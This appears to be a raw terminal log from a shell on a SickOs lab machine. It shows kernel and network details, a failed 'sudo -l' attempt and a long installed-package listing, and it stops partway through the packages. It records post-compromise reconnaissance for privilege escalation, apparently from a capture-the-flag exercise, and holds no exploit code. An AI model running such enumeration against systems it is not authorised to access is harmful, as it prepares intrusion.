Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:b8:7f:12
inet addr:192.168.52.142 Bcast:192.168.52.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:feb8:7f12/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:72672 errors:26 dropped:26 overruns:0 frame:0
TX packets:68866 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:50952579 (50.9 MB) TX bytes:53628509 (53.6 MB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:57873 errors:0 dropped:0 overruns:0 frame:0
TX packets:57873 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:26366636 (26.3 MB) TX bytes:26366636 (26.3 MB)
sudo -l
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version Description
+++-================================-=================================-==========================================================================
ii accountsservice 0.6.15-2ubuntu9.7 query and manipulate user account information
ii acpid 1:2.0.10-1ubuntu3 Advanced Configuration and Power Interface event daemon
ii adduser 3.113ubuntu2 add and remove users and groups
ii apache2 2.2.22-1ubuntu1.10 Apache HTTP Server metapackage
ii apache2-mpm-prefork 2.2.22-1ubuntu1.10 Apache HTTP Server - traditional non-threaded model
ii apache2-utils 2.2.22-1ubuntu1.10 utility programs for webservers
ii apache2.2-bin 2.2.22-1ubuntu1.10 Apache HTTP Server common binary files
ii apache2.2-common 2.2.22-1ubuntu1.10 Apache HTTP Server common files
ii apparmor 2.7.102-0ubuntu3.9 User-space parser utility for AppArmor
ii apport 2.0.1-0ubuntu17.6 automatically generate crash reports for debugging
ii apport-symptoms 0.16.1 symptom scripts for apport
ii apt 0.8.16~exp12ubuntu10.16 commandline package manager
ii apt-transport-https 0.8.16~exp12ubuntu10.16 https download transport for APT
ii apt-utils 0.8.16~exp12ubuntu10.16 package managment related utility programs
ii apt-xapian-index 0.44ubuntu5.1 maintenance and search tools for a Xapian index of Debian packages
ii aptitude 0.6.6-1ubuntu1.2 terminal-based package manager (terminal interface only)
ii at 3.1.13-1ubuntu1 Delayed job execution and batch processing
ii base-files 6.5ubuntu6.7 Debian base system miscellaneous files
ii base-passwd 3.5.24 Debian base system master password and group files
ii bash 4.2-2ubuntu2.1 GNU Bourne Again SHell
ii bash-completion 1:1.3-1ubuntu8.1 programmable completion for the bash shell
ii bc 1.06.95-2ubuntu1 The GNU bc arbitrary precision calculator language
ii bind9-host 1:9.8.1.dfsg.P1-4ubuntu0.8 Version of 'host' bundled with BIND 9.X
ii binutils 2.22-6ubuntu1.3 GNU assembler, linker and binary utilities
ii bsdmainutils 8.2.3ubuntu1 collection of more utilities from FreeBSD
ii bsdutils 1:2.20.1-1ubuntu3 Basic utilities from 4.4BSD-Lite
ii busybox-initramfs 1:1.18.5-1ubuntu4.1 Standalone shell setup for initramfs
ii busybox-static 1:1.18.5-1ubuntu4.1 Standalone rescue shell with tons of builtin utilities
ii byobu 5.17-0ubuntu1 powerful, text based window manager and shell multiplexer
ii bzip2 1.0.6-1 high-quality block-sorting file compressor - utilities
ii ca-certificates 20111211 Common CA certificates
ii command-not-found 0.2.46ubuntu6 Suggest installation of packages in interactive bash sessions
ii command-not-found-data 0.2.46ubuntu6 Set of data files for command-not-found.
ii console-setup 1.70ubuntu5 console font and keymap setup program
ii coreutils 8.13-3ubuntu3.2 GNU core utilities
ii cpio 2.11-7ubuntu3 GNU cpio -- a program to manage archives of files
ii cpp 4:4.6.3-1ubuntu5 GNU C preprocessor (cpp)
ii cpp-4.6 4.6.3-1ubuntu5 GNU C preprocessor
ii cron 3.0pl1-120ubuntu4 process scheduling daemon
ii curl 7.22.0-3ubuntu4.7 Get a file from an HTTP, HTTPS or FTP server
ii dash 0.5.7-2ubuntu2 POSIX-compliant shell
ii dbus 1.4.18-1ubuntu1.4 simple interprocess messaging system (daemon and utilities)
ii debconf 1.5.42ubuntu1 Debian configuration management system
ii debconf-i18n 1.5.42ubuntu1 full internationalization support for debconf
ii debianutils 4.2.1ubuntu2 Miscellaneous utilities specific to Debian
ii diffutils 1:3.2-1ubuntu1 File comparison utilities
ii dmidecode 2.11-4 SMBIOS/DMI table decoder
ii dmsetup 2:1.02.48-4ubuntu7.4 The Linux Kernel Device Mapper userspace library
ii dnsutils 1:9.8.1.dfsg.P1-4ubuntu0.8 Clients provided with BIND
ii dosfstools 3.0.12-1ubuntu1.1 utilities for making and checking MS-DOS FAT filesystems
ii dpkg 1.16.1.2ubuntu7.2 Debian package management system
ii e2fslibs 1.42-1ubuntu2 ext2/ext3/ext4 file system libraries
ii e2fsprogs 1.42-1ubuntu2 ext2/ext3/ext4 file system utilities
ii ed 1.5-3 classic UNIX line editor
ii eject 2.1.5+deb1+cvs20081104-9 ejects CDs and operates CD-Changers under Linux
ii file 5.09-2 Determines file type using "magic" numbers
ii findutils 4.4.2-4ubuntu1 utilities for finding files--find, xargs
ii fontconfig-config 2.8.0-3ubuntu9.1 generic font configuration library - configuration
ii fonts-ubuntu-font-family-console 0.80-0ubuntu2 Ubuntu Font Family Linux console fonts, sans-serif monospace
ii friendly-recovery 0.2.25 Make recovery more user-friendly
ii ftp 0.17-25 classical file transfer client
ii fuse 2.8.6-2ubuntu2 Filesystem in Userspace
ii gcc 4:4.6.3-1ubuntu5 GNU C compiler
ii gcc-4.6 4.6.3-1ubuntu5 GNU C compiler
ii gcc-4.6-base 4.6.3-1ubuntu5 GCC, the GNU Compiler Collection (base package)
ii geoip-database 20111220-1 IP lookup command line tools that use the GeoIP library (country database)
ii gettext-base 0.18.1.1-5ubuntu3 GNU Internationalization utilities for the base system
ii gir1.2-glib-2.0 1.32.0-1 Introspection data for GLib, GObject, Gio and GModule
ii gnupg 1.4.11-3ubuntu2.5 GNU privacy guard - a free PGP replacement
ii gpgv 1.4.11-3ubuntu2.5 GNU privacy guard - signature verification tool
ii grep 2.10-1 GNU grep, egrep and fgrep
ii groff-base 1.21-7 GNU troff text-formatting system (base system components)
ii grub-common 1.99-21ubuntu3.18 GRand Unified Bootloader (common files)
ii grub-gfxpayload-lists 0.6 GRUB gfxpayload blacklist
ii grub-pc 1.99-21ubuntu3.18 GRand Unified Bootloader, version 2 (PC/BIOS version)
ii grub-pc-bin 1.99-21ubuntu3.18 GRand Unified Bootloader, version 2 (PC/BIOS binaries)
ii grub2-common 1.99-21ubuntu3.18 GRand Unified Bootloader (common files for version 2)
ii gzip 1.4-1ubuntu2 GNU compression utilities
ii hdparm 9.37-0ubuntu3.1 tune hard disk parameters for high performance
ii hostname 3.06ubuntu1 utility to set/show the host name or domain name
ii ifupdown 0.7~beta2ubuntu10 high level tools to configure network interfaces
ii info 4.13a.dfsg.1-8ubuntu2 Standalone GNU Info documentation browser
ii initramfs-tools 0.99ubuntu13.4 tools for generating an initramfs
ii initramfs-tools-bin 0.99ubuntu13.4 binaries used by initramfs-tools
ii initscripts 2.88dsf-13.10ubuntu11.1 scripts for initializing and shutting down the system
ii insserv 1.14.0-2.1ubuntu2 Tool to organize boot sequence using LSB init.d script dependencies
ii install-info 4.13a.dfsg.1-8ubuntu2 Manage installed documentation in info format
ii installation-report 2.46ubuntu1 system installation report
ii iproute 20111117-1ubuntu2.1 networking and traffic control tools
ii iptables 1.4.12-1ubuntu5 administration tools for packet filtering and NAT
ii iputils-ping 3:20101006-1ubuntu1 Tools to test the reachability of network hosts
ii iputils-tracepath 3:20101006-1ubuntu1 Tools to trace the network path to a remote host
ii irqbalance 0.56-1ubuntu4 Daemon to balance interrupts for SMP systems
ii isc-dhcp-client 4.1.ESV-R4-0ubuntu5.9 ISC DHCP client
ii isc-dhcp-common 4.1.ESV-R4-0ubuntu5.9 common files used by all the isc-dhcp* packages
ii iso-codes 3.31-1 ISO language, territory, currency, script codes and their translations
ii kbd 1.15.2-3ubuntu4 Linux console font and keytable utilities
ii keyboard-configuration 1.70ubuntu5 system-wide keyboard preferences
ii klibc-utils 1.5.25-1ubuntu2 small utilities built with klibc for early boot
ii krb5-locales 1.10+dfsg~beta1-2ubuntu0.3 Internationalization support for MIT Kerberos
ii landscape-common 13.07.3-0ubuntu0.12.04 The Landscape administration system client - Common files
ii language-pack-en 1:12.04+20140106 translation updates for language English
ii language-pack-en-base 1:12.04+20140106 translations for language English
ii language-selector-common 0.79.4 Language selector for Ubuntu
ii laptop-detect 0.13.7ubuntu2 attempt to detect a laptop
ii less 444-1ubuntu1 pager program similar to more
ii libaccountsservice0 0.6.15-2ubuntu9.7 query and manipulate user account information - shared libraries
ii libacl1 2.2.51-5ubuntu1 Access control list shared library
ii libapache2-mod-php5 5.3.10-1ubuntu3.21 server-side, HTML-embedded scripting language (Apache 2 module)
ii libapr1 1.4.6-1 Apache Portable Runtime Library
ii libaprutil1 1.3.12+dfsg-3 Apache Portable Runtime Utility Library
ii libaprutil1-dbd-sqlite3 1.3.12+dfsg-3 Apache Portable Runtime Utility Library - SQLite3 Driver
ii libaprutil1-ldap 1.3.12+dfsg-3 Apache Portable Runtime Utility Library - LDAP Driver
ii libapt-inst1.4 0.8.16~exp12ubuntu10.16 deb package format runtime library
ii libapt-pkg4.12 0.8.16~exp12ubuntu10.16 package managment runtime library
ii libasn1-8-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - ASN.1 library
ii libattr1 1:2.4.46-5ubuntu1 Extended attribute shared library
ii libbind9-80 1:9.8.1.dfsg.P1-4ubuntu0.8 BIND9 Shared Library used by BIND
ii libblkid1 2.20.1-1ubuntu3 block device id library
ii libboost-iostreams1.46.1 1.46.1-7ubuntu3 Boost.Iostreams Library
ii libbsd0 0.3.0-2 utility functions from BSD systems - shared library
ii libbz2-1.0 1.0.6-1 high-quality block-sorting file compressor library - runtime
ii libc-bin 2.15-0ubuntu10.12 Embedded GNU C Library: Binaries
ii libc-dev-bin 2.15-0ubuntu10.12 Embedded GNU C Library: Development binaries
ii libc6 2.15-0ubuntu10.12 Embedded GNU C Library: Shared libraries
ii libc6-dev 2.15-0ubuntu10.12 Embedded GNU C Library: Development Libraries and Header Files
ii libcap-ng0 0.6.6-1ubuntu1 An alternate POSIX capabilities library
ii libcap2 1:2.22-1ubuntu3 support for getting/setting POSIX.1e capabilities
ii libclass-accessor-perl 0.34-1 Perl module that automatically generates accessors
ii libclass-isa-perl 0.36-3 report the search path for a class's ISA tree
ii libcomerr2 1.42-1ubuntu2 common error description library
ii libcurl3 7.22.0-3ubuntu4.7 Multi-protocol file transfer library (OpenSSL)
ii libcurl3-gnutls 7.22.0-3ubuntu4.7 Multi-protocol file transfer library (GnuTLS)
ii libcwidget3 0.5.16-3.1ubuntu1 high-level terminal interface library for C++ (runtime files)
ii libdb5.1 5.1.25-11build1 Berkeley v5.1 Database Libraries [runtime]
ii libdbd-mysql-perl 4.020-1build2 Perl5 database interface to the MySQL database
ii libdbi-perl 1.616-1build2 Perl Database Interface (DBI)
ii libdbus-1-3 1.4.18-1ubuntu1.4 simple interprocess messaging system (library)
ii libdbus-glib-1-2 0.98-1ubuntu1.1 simple interprocess messaging system (GLib-based shared library)
ii libdevmapper1.02.1 2:1.02.48-4ubuntu7.4 The Linux Kernel Device Mapper userspace library
ii libdns81 1:9.8.1.dfsg.P1-4ubuntu0.8 DNS Shared Library used by BIND
ii libdrm-intel1 2.4.46-1ubuntu0.0.0.1 Userspace interface to intel-specific kernel DRM services -- runtime
ii libdrm-nouveau1a 2.4.46-1ubuntu0.0.0.1 Userspace interface to nouveau-specific kernel DRM services -- runtime
ii libdrm-radeon1 2.4.46-1ubuntu0.0.0.1 Userspace interface to radeon-specific kernel DRM services -- runtime
ii libdrm2 2.4.46-1ubuntu0.0.0.1 Userspace interface to kernel DRM services -- runtime
ii libedit2 2.11-20080614-3ubuntu2 BSD editline and history libraries
ii libelf1 0.152-1ubuntu3 library to read and write ELF files
ii libept1.4.12 1.0.6~exp1ubuntu1 High-level library for managing Debian package information
ii libevent-2.0-5 2.0.16-stable-1 Asynchronous event notification library
ii libexpat1 2.0.1-7.2ubuntu1.1 XML parsing C library - runtime library
ii libffi6 3.0.11~rc1-5 Foreign Function Interface library runtime
ii libfontconfig1 2.8.0-3ubuntu9.1 generic font configuration library - runtime
ii libfreetype6 2.4.8-1ubuntu2.3 FreeType 2 font engine, shared library files
ii libfribidi0 0.19.2-1 Free Implementation of the Unicode BiDi algorithm
ii libfuse2 2.8.6-2ubuntu2 Filesystem in Userspace (library)
ii libgc1c2 1:7.1-8ubuntu0.12.04.1 conservative garbage collector for C and C++
ii libgcc1 1:4.6.3-1ubuntu5 GCC support library
ii libgcrypt11 1.5.0-3ubuntu0.2 LGPL Crypto library - runtime library
ii libgd2-xpm 2.0.36~rc1~dfsg-6ubuntu2 GD Graphics Library version 2
ii libgdbm3 1.8.3-10 GNU dbm database routines (runtime version)
ii libgeoip1 1.4.8+dfsg-2 non-DNS IP-to-country resolver library
ii libgirepository-1.0-1 1.32.0-1 Library for handling GObject introspection data (runtime library)
ii libglib2.0-0 2.32.4-0ubuntu1 GLib library of C routines
ii libgmp10 2:5.0.2+dfsg-2ubuntu1 Multiprecision arithmetic library
ii libgnutls26 2.12.14-5ubuntu3.5 GNU TLS library - runtime library
ii libgomp1 4.6.3-1ubuntu5 GCC OpenMP (GOMP) support library
ii libgpg-error0 1.10-2ubuntu1 library for common error values and messages in GnuPG components
ii libgpm2 1.20.4-4 General Purpose Mouse - shared library
ii libgssapi-krb5-2 1.10+dfsg~beta1-2ubuntu0.3 MIT Kerberos runtime libraries - krb5 GSS-API Mechanism
ii libgssapi3-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - GSSAPI support library
ii libhcrypto4-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - crypto library
ii libheimbase1-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - Base library
ii libheimntlm0-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - NTLM support library
ii libhtml-template-perl 2.10-1 module for using HTML Templates with Perl
ii libhx509-5-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - X509 support library
ii libidn11 1.23-2 GNU Libidn library, implementation of IETF IDN specifications
ii libio-string-perl 1.08-2 Emulate IO::File interface for in-core strings
ii libisc83 1:9.8.1.dfsg.P1-4ubuntu0.8 ISC Shared Library used by BIND
ii libisccc80 1:9.8.1.dfsg.P1-4ubuntu0.8 Command Channel Library used by BIND
ii libisccfg82 1:9.8.1.dfsg.P1-4ubuntu0.8 Config File Handling Library used by BIND
ii libiw30 30~pre9-5ubuntu2 Wireless tools - library
ii libjpeg-turbo8 1.1.90+svn733-0ubuntu4.4 IJG JPEG compliant runtime library.
ii libjpeg8 8c-2ubuntu7 Independent JPEG Group's JPEG runtime library (dependency package)
ii libjs-jquery 1.7.1-1ubuntu1 JavaScript library for dynamic web applications
ii libk5crypto3 1.10+dfsg~beta1-2ubuntu0.3 MIT Kerberos runtime libraries - Crypto Library
ii libkeyutils1 1.5.2-2 Linux Key Management Utilities (library)
ii libklibc 1.5.25-1ubuntu2 minimal libc subset for use with initramfs
ii libkrb5-26-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - libraries
ii libkrb5-3 1.10+dfsg~beta1-2ubuntu0.3 MIT Kerberos runtime libraries
ii libkrb5support0 1.10+dfsg~beta1-2ubuntu0.3 MIT Kerberos runtime libraries - Support library
ii libldap-2.4-2 2.4.28-1.1ubuntu4.4 OpenLDAP libraries
ii liblocale-gettext-perl 1.05-7build1 module using libc functions for internationalization in Perl
ii liblockfile-bin 1.09-3ubuntu0.1 support binaries for and cli utilities based on liblockfile
ii liblockfile1 1.09-3ubuntu0.1 NFS-safe locking library
ii libltdl7 2.4.2-1ubuntu1 A system independent dlopen wrapper for GNU libtool
ii liblwres80 1:9.8.1.dfsg.P1-4ubuntu0.8 Lightweight Resolver Library used by BIND
ii liblzma5 5.1.1alpha+20110809-3 XZ-format compression library
ii libmagic1 5.09-2 File type determination library using "magic" numbers
ii libmcrypt4 2.5.8-3.1 De-/Encryption Library
ii libmount1 2.20.1-1ubuntu3 block device id library
ii libmpc2 0.9-4 multiple precision complex floating-point library
ii libmpfr4 3.1.0-3ubuntu2 multiple precision floating-point computation
ii libmysqlclient18 5.5.46-0ubuntu0.12.04.2 MySQL database client library
ii libncurses5 5.9-4 shared libraries for terminal handling
ii libncursesw5 5.9-4 shared libraries for terminal handling (wide character support)
ii libnet-daemon-perl 0.48-1 Perl module for building portable Perl daemons easily
ii libnewt0.52 0.52.11-2ubuntu10 Not Erik's Windowing Toolkit - text mode windowing with slang
ii libnfnetlink0 1.0.0-1 Netfilter netlink library
ii libnih-dbus1 1.0.3-4ubuntu9.1 NIH D-Bus Bindings Library
ii libnih1 1.0.3-4ubuntu9.1 NIH Utility Library
ii libnl-3-200 3.2.3-2ubuntu2 library for dealing with netlink sockets
ii libnl-genl-3-200 3.2.3-2ubuntu2 library for dealing with netlink sockets - generic netlink
ii libp11-kit0 0.12-2ubuntu1 Library for loading and coordinating access to PKCS#11 modules - runtime
ii libpam-modules 1.1.3-7ubuntu2 Pluggable Authentication Modules for PAM
ii libpam-modules-bin 1.1.3-7ubuntu2 Pluggable Authentication Modules for PAM - helper binaries
ii libpam-runtime 1.1.3-7ubuntu2 Runtime support for the PAM library
ii libpam0g 1.1.3-7ubuntu2 Pluggable Authentication Modules library
ii libparse-debianchangelog-perl 1.2.0-1ubuntu1 parse Debian changelogs and output them in other formats
ii libparted0debian1 2.3-8ubuntu5.1 disk partition manipulator - shared library
ii libpcap0.8 1.1.1-10 system interface for user-level packet capture
ii libpci3 1:3.1.8-2ubuntu6 Linux PCI Utilities (shared library)
ii libpciaccess0 0.12.902-1ubuntu0.2 Generic PCI access library for X
ii libpcre3 8.12-4 Perl 5 Compatible Regular Expression Library - runtime files
ii libpcsclite1 1.7.4-2ubuntu2 Middleware to access a smart card using PC/SC (library)
ii libpipeline1 1.2.1-1 pipeline manipulation library
ii libplrpc-perl 0.2020-2 Perl extensions for writing PlRPC servers and clients
ii libplymouth2 0.8.2-2ubuntu31.1 graphical boot animation and logger - shared libraries
ii libpng12-0 1.2.46-3ubuntu4 PNG library - runtime
ii libpolkit-gobject-1-0 0.104-1ubuntu1.1 PolicyKit Authorization API
ii libpopt0 1.16-3ubuntu1 lib for parsing cmdline parameters
ii libpython2.7 2.7.3-0ubuntu3.4 Shared Python runtime library (version 2.7)
ii libquadmath0 4.6.3-1ubuntu5 GCC Quad-Precision Math Library
ii libreadline6 6.2-8 GNU readline and history libraries, run-time libraries
ii libroken18-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - roken support library
ii librtmp0 2.4~20110711.gitc28f1bab-1 toolkit for RTMP streams (shared library)
ii libsasl2-2 2.1.25.dfsg1-3ubuntu0.1 Cyrus SASL - authentication abstraction library
ii libsasl2-modules 2.1.25.dfsg1-3ubuntu0.1 Cyrus SASL - pluggable authentication modules
ii libselinux1 2.1.0-4.1ubuntu1 SELinux runtime shared libraries
ii libsigc++-2.0-0c2a 2.2.10-0ubuntu2 type-safe Signal Framework for C++ - runtime
ii libslang2 2.2.4-3ubuntu1 S-Lang programming library - runtime version
ii libsqlite3-0 3.7.9-2ubuntu1.1 SQLite 3 shared library
ii libss2 1.42-1ubuntu2 command-line interface parsing library
ii libssl1.0.0 1.0.1-4ubuntu5.11 SSL shared libraries
ii libstdc++6 4.6.3-1ubuntu5 GNU Standard C++ Library v3
ii libsub-name-perl 0.05-1build2 module for assigning a new name to referenced sub
ii libswitch-perl 2.16-2 switch statement for Perl
ii libt1-5 5.1.2-3.4ubuntu1 Type 1 font rasterizer library - runtime
ii libtasn1-3 2.10-1ubuntu1.1 Manage ASN.1 structures (runtime)
ii libterm-readkey-perl 2.30-4build3 A perl module for simple terminal control
ii libtext-charwidth-perl 0.04-7build1 get display widths of characters on the terminal
ii libtext-iconv-perl 1.7-5 converts between character sets in Perl
ii libtext-wrapi18n-perl 0.06-7 internationalized substitute of Text::Wrap
ii libtimedate-perl 1.2000-1 collection of modules to manipulate date/time information
ii libtinfo5 5.9-4 shared low-level terminfo library for terminal handling
ii libudev0 175-0ubuntu9.4 udev library
ii libusb-0.1-4 2:0.1.12-20 userspace USB programming library
ii libusb-1.0-0 2:1.0.9~rc3-2ubuntu1 userspace USB programming library
ii libuuid1 2.20.1-1ubuntu3 Universally Unique ID library
ii libwind0-heimdal 1.6~git20120311.dfsg.1-2ubuntu0.1 Heimdal Kerberos - stringprep implementation
ii libwrap0 7.6.q-21 Wietse Venema's TCP wrappers library
ii libx11-6 2:1.4.99.1-0ubuntu2.2 X11 client-side library
ii libx11-data 2:1.4.99.1-0ubuntu2.2 X11 client-side library
ii libxapian22 1.2.8-1 Search engine library
ii libxau6 1:1.0.6-4 X11 authorisation library
ii libxcb1 1.8.1-1ubuntu0.2 X C Binding
ii libxdmcp6 1:1.1.0-4 X11 Display Manager Control Protocol library
ii libxext6 2:1.3.0-3ubuntu0.1 X11 miscellaneous extension library
ii libxml2 2.7.8.dfsg-5.1ubuntu4.6 GNOME XML library
ii libxmuu1 2:1.1.0-3 X11 miscellaneous micro-utility library
ii libxpm4 1:3.5.9-4 X11 pixmap library
ii linux-firmware 1.79.9 Firmware for Linux kernel drivers
ii linux-generic-lts-saucy 3.11.0.15.14 Generic Linux kernel image and headers
ii linux-headers-3.11.0-15 3.11.0-15.25~precise1 Header files related to Linux kernel version 3.11.0
ii linux-headers-3.11.0-15-generic 3.11.0-15.25~precise1 Linux kernel headers for version 3.11.0 on 32 bit x86 SMP
ii linux-headers-generic-lts-saucy 3.11.0.15.14 Generic Linux kernel headers
ii linux-image-3.11.0-15-generic 3.11.0-15.25~precise1 Linux kernel image for version 3.11.0 on 32 bit x86 SMP
ii linux-image-generic-lts-saucy 3.11.0.15.14 Generic Linux kernel image
ii linux-libc-dev 3.2.0-90.128 Linux Kernel Headers for development
ii locales 2.13+git20120306-3 common files for locale support
ii lockfile-progs 0.1.16 Programs for locking and unlocking files and mailboxes
ii login 1:4.1.4.2+svn3283-3ubuntu5.1 system login tools
ii logrotate 3.7.8-6ubuntu5 Log rotation utility
ii lsb-base 4.0-0ubuntu20.3 Linux Standard Base 4.0 init script functionality
ii lsb-release 4.0-0ubuntu20.3 Linux Standard Base version reporting utility
ii lshw 02.15-2 information about hardware configuration
ii lsof 4.81.dfsg.1-1build1 List open files
ii ltrace 0.5.3-2.1ubuntu2 Tracks runtime library calls in dynamically linked programs
ii makedev 2.3.1-89ubuntu2 creates device files in /dev
ii man-db 2.6.1-2ubuntu1 on-line manual pager
ii manpages 3.35-0.1ubuntu1 Manual pages about using a GNU/Linux system
ii manpages-dev 3.35-0.1ubuntu1 Manual pages about using GNU/Linux for development
ii mawk 1.3.3-17 a pattern scanning and text processing language
ii memtest86+ 4.20-1.1ubuntu1 thorough real-mode memory tester
ii mime-support 3.51-1ubuntu1 MIME files 'mime.types' & 'mailcap', and support programs
ii mlocate 0.23.1-1ubuntu2 quickly find files on the filesystem based on their name
ii module-init-tools 3.16-1ubuntu2 tools for managing Linux kernel modules
ii mount 2.20.1-1ubuntu3 Tools for mounting and manipulating filesystems
ii mountall 2.36.4 filesystem mounting tool
ii mtr-tiny 0.80-1ubuntu1 Full screen ncurses traceroute tool
ii multiarch-support 2.15-0ubuntu10.5 Transitional package to ensure multiarch compatibility
ii mysql-client-5.5 5.5.46-0ubuntu0.12.04.2 MySQL database client binaries
ii mysql-client-core-5.5 5.5.46-0ubuntu0.12.04.2 MySQL database core client binaries
ii mysql-common 5.5.46-0ubuntu0.12.04.2 MySQL database common files, e.g. /etc/mysql/my.cnf
ii mysql-server 5.5.46-0ubuntu0.12.04.2 MySQL database server (metapackage depending on the latest version)
ii mysql-server-5.5 5.5.46-0ubuntu0.12.04.2 MySQL database server binaries and system database setup
ii mysql-server-core-5.5 5.5.46-0ubuntu0.12.04.2 MySQL database server binaries
ii nano 2.2.6-1 small, friendly text editor inspired by Pico
ii ncurses-base 5.9-4 basic terminal type definitions
ii ncurses-bin 5.9-4 terminal-related programs and man pages
ii net-tools 1.60-24.1ubuntu2 The NET-3 networking toolkit
ii netbase 4.47ubuntu1 Basic TCP/IP networking system
ii netcat 1.10-39 TCP/IP swiss army knife -- transitional package
ii netcat-openbsd 1.89-4ubuntu1 TCP/IP swiss army knife
ii netcat-traditional 1.10-39 TCP/IP swiss army knife
ii ntfs-3g 1:2012.1.15AR.1-1ubuntu1.2 read/write NTFS driver for FUSE
ii ntpdate 1:4.2.6.p3+dfsg-1ubuntu3.1 client for setting system time from NTP servers
ii openssh-client 1:5.9p1-5ubuntu1.1 secure shell (SSH) client, for secure access to remote machines
ii openssh-server 1:5.9p1-5ubuntu1.1 secure shell (SSH) server, for secure access from remote machines
ii openssl 1.0.1-4ubuntu5.11 Secure Socket Layer (SSL) binary and related cryptographic tools
ii os-prober 1.51ubuntu3 utility to detect other OSes on a set of drives
ii parted 2.3-8ubuntu5.1 disk partition manipulator
ii passwd 1:4.1.4.2+svn3283-3ubuntu5.1 change and administer password and group data
ii patch 2.6.1-3 Apply a diff file to an original
ii pciutils 1:3.1.8-2ubuntu6 Linux PCI Utilities
ii perl 5.14.2-6ubuntu2.3 Larry Wall's Practical Extraction and Report Language
ii perl-base 5.14.2-6ubuntu2.3 minimal Perl system
ii perl-modules 5.14.2-6ubuntu2.3 Core Perl modules
ii php5 5.3.10-1ubuntu3.19 server-side, HTML-embedded scripting language (metapackage)
ii php5-cli 5.3.10-1ubuntu3.21 command-line interpreter for the php5 scripting language
ii php5-common 5.3.10-1ubuntu3.21 Common files for packages built from the php5 source
ii php5-gd 5.3.10-1ubuntu3.21 GD module for php5
ii php5-mcrypt 5.3.5-0ubuntu1 MCrypt module for php5
ii php5-mysql 5.3.10-1ubuntu3.21 MySQL module for php5
ii plymouth 0.8.2-2ubuntu31.1 graphical boot animation and logger - main package
ii plymouth-theme-ubuntu-text 0.8.2-2ubuntu31.1 graphical boot animation and logger - ubuntu-logo theme
ii popularity-contest 1.53ubuntu1 Vote for your favourite packages automatically
ii powermgmt-base 1.31 Common utils and configs for power management
ii ppp 2.4.5-5ubuntu1 Point-to-Point Protocol (PPP) - daemon
ii pppconfig 2.3.18+nmu3ubuntu1 A text menu based utility for configuring ppp
ii pppoeconf 1.20ubuntu1 configures PPPoE/ADSL connections
ii procps 1:3.2.8-11ubuntu6.3 /proc file system utilities
ii psmisc 22.15-2ubuntu1.1 utilities that use the proc file system
ii python 2.7.3-0ubuntu2.2 interactive high-level object-oriented language (default version)
ii python-apport 2.0.1-0ubuntu17.6 apport crash report handling library
ii python-apt 0.8.3ubuntu7.2 Python interface to libapt-pkg
ii python-apt-common 0.8.3ubuntu7.2 Python interface to libapt-pkg (locales)
ii python-chardet 2.0.1-2build1 universal character encoding detector
ii python-crypto 2.4.1-1ubuntu0.1 cryptographic algorithms and protocols for Python
ii python-dbus 1.0.0-1ubuntu1 simple interprocess messaging system (Python interface)
ii python-dbus-dev 1.0.0-1ubuntu1 main loop integration development files for python-dbus
ii python-debian 0.1.21ubuntu1 Python modules to work with Debian-related data formats
ii python-gdbm 2.7.3-1ubuntu1 GNU dbm database support for Python
ii python-gi 3.2.2-1~precise Python 2.x bindings for gobject-introspection libraries
ii python-gnupginterface 0.3.2-9.1ubuntu3 Python interface to GnuPG (GPG)
ii python-httplib2 0.7.2-1ubuntu2.1 comprehensive HTTP client library written for Python
ii python-keyring 0.9.2-0ubuntu0.12.04.2 store and access your passwords safely
ii python-launchpadlib 1.9.12-1 Launchpad web services client library
ii python-lazr.restfulclient 0.12.0-1ubuntu1.1 client for lazr.restful-based web services
ii python-lazr.uri 1.0.3-1 library for parsing, manipulating, and generating URIs
ii python-minimal 2.7.3-0ubuntu2.2 minimal subset of the Python language (default version)
ii python-newt 0.52.11-2ubuntu10 A NEWT module for Python
ii python-oauth 1.0.1-3build1 Python library implementing of the OAuth protocol
ii python-openssl 0.12-1ubuntu2.1 Python wrapper around the OpenSSL library
ii python-pam 0.4.2-12.2ubuntu4 A Python interface to the PAM library
ii python-pkg-resources 0.6.24-1ubuntu1 Package Discovery and Resource Access using pkg_resources
ii python-problem-report 2.0.1-0ubuntu17.6 Python library to handle problem reports
ii python-serial 2.5-2.1build1 pyserial - module encapsulating access for the serial port
ii python-simplejson 2.3.2-1 simple, fast, extensible JSON encoder/decoder for Python
ii python-twisted-bin 11.1.0-1ubuntu2 Event-based framework for internet applications
ii python-twisted-core 11.1.0-1ubuntu2 Event-based framework for internet applications
ii python-wadllib 1.3.0-2 Python library for navigating WADL files
ii python-xapian 1.2.8-1 Xapian search engine interface for Python
ii python-zope.interface 3.6.1-1ubuntu3 Interfaces for Python
ii python2.7 2.7.3-0ubuntu3.4 Interactive high-level object-oriented language (version 2.7)
ii python2.7-minimal 2.7.3-0ubuntu3.4 Minimal subset of the Python language (version 2.7)
ii readline-common 6.2-8 GNU readline and history libraries, common files
